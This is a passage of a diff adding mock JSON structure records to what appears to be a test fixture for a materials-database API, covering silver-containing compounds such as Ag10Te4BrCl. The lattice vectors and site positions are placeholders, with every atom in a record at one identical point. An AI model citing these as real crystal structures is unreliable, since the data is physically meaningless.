"2019-06-08T05:13:37.369000", + "elements": [ + "Ag", + "Br", + "Cl", + "Te" + ], + "nelements": 4, + "elements_ratios": [ + 0.625, + 0.0625, + 0.0625, + 0.25 + ], + "chemical_formula_descriptive": "Ag10Te4BrCl", + "chemical_formula_reduced": "Ag10Te4BrCl", + "chemical_formula_anonymous": "A10B4CD", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 5.327614134703666, + 0, + 0 + ], + [ + 0, + 1.8722403722833025, + 0 + ], + [ + 0, + 0, + 4.493462985508826 + ] + ], + "cartesian_site_positions": [ + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ], + [ + 0.9164521459850508, + 0.9164521459850508, + 0.9164521459850508 + ] + ], + "nsites": 16, + "species_at_sites": [ + "Ag", + "Ag", + "Ag", + "Ag", + "Ag", + "Ag", + "Ag", + "Ag", + "Ag", + "Ag", + "Br", + "Cl", + "Te", + "Te", + "Te", + "Te" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": 
"Br", + "chemical_symbols": [ + "Br" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Te", + "chemical_symbols": [ + "Te" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-Br-Cl-Te" + } + }, + { + "id": "mpf_259", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.377000", + "elements": [ + "Ag", + "C", + "Cl", + "N", + "O", + "S" + ], + "nelements": 6, + "elements_ratios": [ + 0.2, + 0.1, + 0.1, + 0.1, + 0.4, + 0.1 + ], + "chemical_formula_descriptive": "Ag2CSNClO4", + "chemical_formula_reduced": "Ag2CSNClO4", + "chemical_formula_anonymous": "A4B2CDEF", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 7.7673999365129625, + 0, + 0 + ], + [ + 0, + 9.869311574261594, + 0 + ], + [ + 0, + 0, + 4.715180447893034 + ] + ], + "cartesian_site_positions": [ + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ], + [ + 0.48493191553525494, + 0.48493191553525494, + 0.48493191553525494 + ] + ], + "nsites": 10, + "species_at_sites": [ + "Ag", + "Ag", + "C", + "Cl", + "N", + "O", + "O", + "O", + "O", + "S" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "C", + "chemical_symbols": [ + "C" + 
], + "concentration": [ + 1 + ] + }, + { + "name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "N", + "chemical_symbols": [ + "N" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + }, + { + "name": "S", + "chemical_symbols": [ + "S" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-C-Cl-N-O-S" + } + }, + { + "id": "mpf_272", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.380000", + "elements": [ + "Ag", + "C", + "Cl", + "H", + "N" + ], + "nelements": 5, + "elements_ratios": [ + 0.08333333333333333, + 0.25, + 0.041666666666666664, + 0.5, + 0.125 + ], + "chemical_formula_descriptive": "Ag2H12C6N3Cl", + "chemical_formula_reduced": "Ag2H12C6N3Cl", + "chemical_formula_anonymous": "A12B6C3D2E", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 6.436155587878937, + 0, + 0 + ], + [ + 0, + 4.664748073818609, + 0 + ], + [ + 0, + 0, + 0.554511276982016 + ] + ], + "cartesian_site_positions": [ + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + 
], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ], + [ + 0.2111398706842884, + 0.2111398706842884, + 0.2111398706842884 + ] + ], + "nsites": 24, + "species_at_sites": [ + "Ag", + "Ag", + "C", + "C", + "C", + "C", + "C", + "C", + "Cl", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "N", + "N", + "N" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "C", + "chemical_symbols": [ + "C" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "N", + "chemical_symbols": [ + "N" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-C-Cl-H-N" + } + }, + { + "id": "mpf_276", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.381000", + "elements": [ + "Ag", + "C", + "H", + "N", + "O" + ], + "nelements": 5, + "elements_ratios": [ + 0.08, + 0.08, + 0.08, + 0.24, + 0.52 + ], + "chemical_formula_descriptive": "Ag2H2C2N6O13", + "chemical_formula_reduced": "Ag2H2C2N6O13", + 
"chemical_formula_anonymous": "A13B6C2D2E2", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 2.9527224047457192, + 0, + 0 + ], + [ + 0, + 9.517463347989763, + 0 + ], + [ + 0, + 0, + 7.304866428016529 + ] + ], + "cartesian_site_positions": [ + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 
0.5949974616251396, + 0.5949974616251396 + ], + [ + 0.5949974616251396, + 0.5949974616251396, + 0.5949974616251396 + ] + ], + "nsites": 25, + "species_at_sites": [ + "Ag", + "Ag", + "C", + "C", + "H", + "H", + "N", + "N", + "N", + "N", + "N", + "N", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "C", + "chemical_symbols": [ + "C" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "N", + "chemical_symbols": [ + "N" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-C-H-N-O" + } + }, + { + "id": "mpf_281", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.382000", + "elements": [ + "Ag", + "C", + "Cl", + "H", + "N", + "O", + "S" + ], + "nelements": 7, + "elements_ratios": [ + 0.08695652173913043, + 0.08695652173913043, + 0.043478260869565216, + 0.34782608695652173, + 0.21739130434782608, + 0.13043478260869565, + 0.08695652173913043 + ], + "chemical_formula_descriptive": "Ag2H8C2S2N5ClO3", + "chemical_formula_reduced": "Ag2H8C2S2N5ClO3", + "chemical_formula_anonymous": "A8B5C3D2E2F2G", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 1.2419933831646812, + 0, + 0 + ], + [ + 0, + 9.07403560922435, + 0 + ], + [ + 0, + 0, + 2.5607011301206617 + ] + ], + "cartesian_site_positions": [ + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 
0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ], + [ + 0.5043032722543139, + 0.5043032722543139, + 0.5043032722543139 + ] + ], + "nsites": 23, + "species_at_sites": [ + "Ag", + "Ag", + "C", + "C", + "Cl", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "N", + "N", + "N", + "N", + "N", + "O", + "O", + "O", + "S", + "S" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "C", + "chemical_symbols": [ + "C" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "N", + "chemical_symbols": [ + "N" + ], + 
"concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + }, + { + "name": "S", + "chemical_symbols": [ + "S" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-C-Cl-H-N-O-S" + } + }, + { + "id": "mpf_446", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.412000", + "elements": [ + "Ag", + "Br", + "Cl", + "Hg", + "I", + "S" + ], + "nelements": 6, + "elements_ratios": [ + 0.2222222222222222, + 0.05555555555555555, + 0.1111111111111111, + 0.2777777777777778, + 0.05555555555555555, + 0.2777777777777778 + ], + "chemical_formula_descriptive": "Ag4Hg5S5IBrCl2", + "chemical_formula_reduced": "Ag4Hg5S5IBrCl2", + "chemical_formula_anonymous": "A5B5C4D2EF", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 5.132691156529571, + 0, + 0 + ], + [ + 0, + 1.8270015294181907, + 0 + ], + [ + 0, + 0, + 4.5549149749018225 + ] + ], + "cartesian_site_positions": [ + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, 
+ 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ], + [ + 0.7184493830657678, + 0.7184493830657678, + 0.7184493830657678 + ] + ], + "nsites": 18, + "species_at_sites": [ + "Ag", + "Ag", + "Ag", + "Ag", + "Br", + "Cl", + "Cl", + "Hg", + "Hg", + "Hg", + "Hg", + "Hg", + "I", + "S", + "S", + "S", + "S", + "S" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Br", + "chemical_symbols": [ + "Br" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Hg", + "chemical_symbols": [ + "Hg" + ], + "concentration": [ + 1 + ] + }, + { + "name": "I", + "chemical_symbols": [ + "I" + ], + "concentration": [ + 1 + ] + }, + { + "name": "S", + "chemical_symbols": [ + "S" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-Br-Cl-Hg-I-S" + } + }, + { + "id": "mpf_551", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.434000", + "elements": [ + "Ag", + "B", + "C", + "Cl", + "H", + "N", + "O", + "P" + ], + "nelements": 8, + "elements_ratios": [ + 0.013513513513513514, + 0.13513513513513514, + 0.20270270270270271, + 0.02702702702702703, + 0.5405405405405406, + 0.013513513513513514, + 0.04054054054054054, + 0.02702702702702703 + ], + "chemical_formula_descriptive": "AgB10P2H40C15NCl2O3", + "chemical_formula_reduced": "AgB10P2H40C15NCl2O3", + "chemical_formula_anonymous": "A40B15C10D3E2F2GH", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 5.055370731514176, + 0, + 0 + ], + [ + 0, + 4.77221883540092, + 0 + ], + [ + 0, + 0, + 5.704704278000719 + ] + ], + "cartesian_site_positions": [ + [ + 0.449480176317956, + 
0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 
0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 
0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ], + [ + 0.449480176317956, + 0.449480176317956, + 0.449480176317956 + ] + ], + "nsites": 74, + "species_at_sites": [ + "Ag", + "B", + "B", + "B", + "B", + "B", + "B", + "B", + "B", + "B", + "B", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "C", + "Cl", + "Cl", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "N", + "O", + "O", + "O", + "P", + "P" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "B", + "chemical_symbols": [ + "B" + ], + "concentration": [ 
+ 1 + ] + }, + { + "name": "C", + "chemical_symbols": [ + "C" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cl", + "chemical_symbols": [ + "Cl" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "N", + "chemical_symbols": [ + "N" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + }, + { + "name": "P", + "chemical_symbols": [ + "P" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag-B-C-Cl-H-N-O-P" + } + }, + { + "id": "mpf_632", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.450000", + "elements": [ + "Ag", + "C", + "Cl", + "H", + "N", + "O", + "S" + ], + "nelements": 7, + "elements_ratios": [ + 0.034482758620689655, + 0.10344827586206896, + 0.034482758620689655, + 0.4827586206896552, + 0.20689655172413793, + 0.034482758620689655, + 0.10344827586206896 + ], + "chemical_formula_descriptive": "AgH14C3S3N6ClO", + "chemical_formula_reduced": "AgH14C3S3N6ClO", + "chemical_formula_anonymous": "A14B6C3D3EFG", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 4.438269887249414, + 0, + 0 + ], + [ + 0, + 0.0037263506973483906, + 0 + ], + [ + 0, + 0, + 2.879535498740032 + ] + ], + "cartesian_site_positions": [ + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 
0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ], + [ + 0.9116303665281374, + 0.9116303665281374, + 0.9116303665281374 + ] + ], + "nsites": 29, + "species_at_sites": [ + "Ag", + "C", + "C", + "C", + "Cl", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "H", + "N", + "N", + "N", + "N", + "N", + "N", + "O", + "S", + "S", + "S" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "C", + "chemical_symbols": [ + "C" + ], + "concentration": [ + 1 + ] + }, + { + 
